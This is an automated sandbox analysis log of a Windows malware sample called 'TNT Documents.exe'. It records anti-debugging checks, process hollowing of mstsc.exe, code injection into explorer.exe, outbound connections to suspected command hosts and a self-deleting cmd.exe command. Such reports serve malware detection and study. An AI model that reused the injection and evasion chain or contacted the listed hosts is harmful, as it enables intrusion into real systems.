          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05680EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0564FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055DB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055DB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055BB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055BB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055BC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055B9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055B9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055B9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055D4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055D4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055D4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055D4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055D4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_056441E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055BB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055BB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055BB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_056369A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055EA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_056351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_056351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_056351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_056351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055DC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055D0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055D0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05672073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05681074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05637016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05637016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05637016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055CB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055CB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055CB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055CB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05684015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05684015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0564B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0564B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0564B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0564B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0564B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0564B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055B58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055B9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055EF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055EF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055EF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05633884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05633884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055BF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055BDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05688B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055BDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0567131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_056353CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_056353CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055DDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05685BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055EB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0566D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0567138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0566B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0566B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\mstsc.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_00409B50 LdrLoadDll,
          Source: C:\Users\user\Desktop\TNT Documents.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.metronixmedical.com
          Source: C:\Windows\explorer.exeDomain query: www.specialtyplastics.online
          Source: C:\Windows\explorer.exeNetwork Connect: 51.255.30.106 80
          Source: C:\Windows\explorer.exeNetwork Connect: 119.18.54.99 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeDomain query: www.cortepuroiberico.com
          Source: C:\Windows\explorer.exeNetwork Connect: 209.17.116.163 80
          Source: C:\Windows\explorer.exeDomain query: www.coached.info
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\TNT Documents.exeSection unmapped: C:\Windows\SysWOW64\mstsc.exe base address: EC0000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\TNT Documents.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\TNT Documents.exeSection loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\TNT Documents.exeSection loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\TNT Documents.exeMemory written: C:\Users\user\Desktop\TNT Documents.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\TNT Documents.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\TNT Documents.exeThread register set: target process: 3292
          Source: C:\Windows\SysWOW64\mstsc.exeThread register set: target process: 3292
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess created: C:\Users\user\Desktop\TNT Documents.exe {path}
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess created: C:\Users\user\Desktop\TNT Documents.exe {path}
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\TNT Documents.exe"
          Source: explorer.exe, 0000000B.00000000.316085320.0000000001400000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.295462670.0000000001400000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.336652240.0000000001400000.00000002.00020000.sdmp, mstsc.exe, 00000011.00000002.524622785.0000000003E50000.00000002.00020000.sdmpBinary or memory string: uProgram Manager
          Source: explorer.exe, 0000000B.00000000.316085320.0000000001400000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.319293642.0000000005F40000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.295462670.0000000001400000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.336652240.0000000001400000.00000002.00020000.sdmp, mstsc.exe, 00000011.00000002.524622785.0000000003E50000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000B.00000000.316085320.0000000001400000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.295462670.0000000001400000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.336652240.0000000001400000.00000002.00020000.sdmp, mstsc.exe, 00000011.00000002.524622785.0000000003E50000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 0000000B.00000000.316085320.0000000001400000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.295462670.0000000001400000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.336652240.0000000001400000.00000002.00020000.sdmp, mstsc.exe, 00000011.00000002.524622785.0000000003E50000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 0000000B.00000000.336206590.0000000000EB8000.00000004.00000020.sdmp, explorer.exe, 0000000B.00000000.314892260.0000000000EB8000.00000004.00000020.sdmp, explorer.exe, 0000000B.00000000.294735677.0000000000EB8000.00000004.00000020.sdmpBinary or memory string: ProgmanX
          Source: explorer.exe, 0000000B.00000000.344277023.0000000008ACF000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.323053985.0000000008ACF000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.305962402.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndAj
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Users\user\Desktop\TNT Documents.exe VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
